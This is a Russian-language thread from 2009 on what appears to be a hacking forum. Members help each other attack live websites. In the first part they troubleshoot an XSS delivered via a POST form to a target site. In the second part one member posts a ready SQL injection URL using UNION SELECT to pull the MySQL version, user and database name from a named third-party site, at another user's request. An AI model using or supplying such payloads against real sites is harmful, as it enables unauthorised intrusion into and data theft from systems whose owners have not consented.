12.02.2009, 02:41
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
С нами:
11020706
Репутация:
4693
|
|
Сообщение от o3,14um
Сайт построен на АЯКС. Нашёл КСС-ку. Но когда пытаюсь отправить данные на сервер методом ПОСТ, то вылетает ошибка:
что это может быть?
mozarat, покажи свой запрос, что ты составляешь
Это ответ сервера такой, или ИЕ не может распарсить полученый XML ? (Проверь сниффером)
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
12.02.2009, 02:56
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
С нами:
10254549
Репутация:
227
|
|
Это ошибка браузера (там была мозилки). Вот как она выглядит в Опере:
Ошибка!
Ошибка разбора XML
Ошибка разбора XML: синтаксическая ошибка (Строка: 1, Символ: 0)
Обработать документ как HTML
Ошибка:unexpected text (non-whitespace text outside root element)
Описание:http://www.w3.org/TR/REC-xml/
1: ok
А ведь запрос такой-же вроде создаю, с единственной, пожалуй разницей - реферрер не тот.
Вобщем задача - избежать ошибки, чтобы ксс выполнялась корректно
Последний раз редактировалось o3,14um; 12.02.2009 в 03:04..
|
|
|
|
12.02.2009, 03:09
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
С нами:
10077446
Репутация:
1020
|
|
Сообщение от o3,14um
Это ошибка браузера (там была мозилки). Вот как она выглядит в Опере:
А ведь запрос такой-же вроде создаю, с единственной, пожалуй разницей - реферрер не тот.
Вобщем задача - избежать ошибки, чтобы ксс выполнялась корректно
Ну наверно надо втулить коректный xml в ответе что бы небыло ошибко. А вобше аяксом(вернее XMLHttpRequest) ты не отравишь ничего на другой хост ибо политики безопасности не дадут.
Последний раз редактировалось AkyHa_MaTaTa; 12.02.2009 в 03:12..
|
|
|
|
12.02.2009, 17:15
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
С нами:
10254549
Репутация:
227
|
|
так я отправлял пост-запрос на сервер не посредством XMLHttpRequest, а через простую http форму.
Или так оно не примет и о xss можно забыть?
Последний раз редактировалось o3,14um; 12.02.2009 в 17:21..
|
|
|
|
12.02.2009, 20:50
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
С нами:
10077446
Репутация:
1020
|
|
Сообщение от o3,14um
так я отправлял пост-запрос на сервер не посредством XMLHttpRequest, а через простую http форму.
Или так оно не примет и о xss можно забыть?
А у тебя есть возможность изменить action? Или ты пытаешь автоформу зделать? Ну xss возможна если ты можешь встроить в страницу свой html(js) код посредством изменения каких то параметров передоваемых скрипту(грубо говоря и не вдаваясь в подробности), и если ты отправляешь форму(обычную) post на http://hacsite.ru/12.php то следуя из ошибко видно что у тебя отрпавляеться Content-type: text/xml(ну или xslt) в ответе от http://hacsite.ru/12.php но возрашаемое тело документа далеко не xml.
|
|
|
|
12.02.2009, 20:35
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
С нами:
9370904
Репутация:
-4
|
|
http://www.panelmonkey.org/category.php?id=1
Здрасте всем . Што делот , немогу некак понять , если там вопше Sql ?
|
|
|
|
12.02.2009, 20:44
|
|
Новичок
Регистрация: 18.11.2008
Сообщений: 28
С нами:
9198543
Репутация:
15
|
|
есть
|
|
|
|
12.02.2009, 20:45
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
С нами:
9370904
Репутация:
-4
|
|
Помагите , зделот хут кокойто запрос ...
|
|
|
|
12.02.2009, 20:50
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами:
9270510
Репутация:
519
|
|
http://www.panelmonkey.org/background.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7--
|
|
|
|
12.02.2009, 20:57
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
С нами:
9370904
Репутация:
-4
|
|
странно!
-m0rgan-
почемуто по твоему запросу мне показываеть токо вот што : sqldb was unable to successfully run a MySQL query.
И на все тругие тоше самое ..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Комбинированный вид
